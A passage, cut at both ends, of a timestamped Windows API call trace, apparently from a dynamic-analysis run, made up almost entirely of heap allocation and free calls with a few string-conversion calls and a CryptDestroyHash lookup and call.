hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.897] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.897] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.897] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.898] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.898] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.899] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.899] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.899] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.900] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.900] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.900] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0256.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.901] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0256.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0256.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0256.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.902] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0256.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0256.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0256.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0256.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.903] CryptDestroyHash (hHash=0xaa5860) returned 1 [0256.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0256.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0256.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0256.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0256.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0256.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0256.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.906] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.906] RtlAllocateHeap (HeapHandle=0x25c0000, 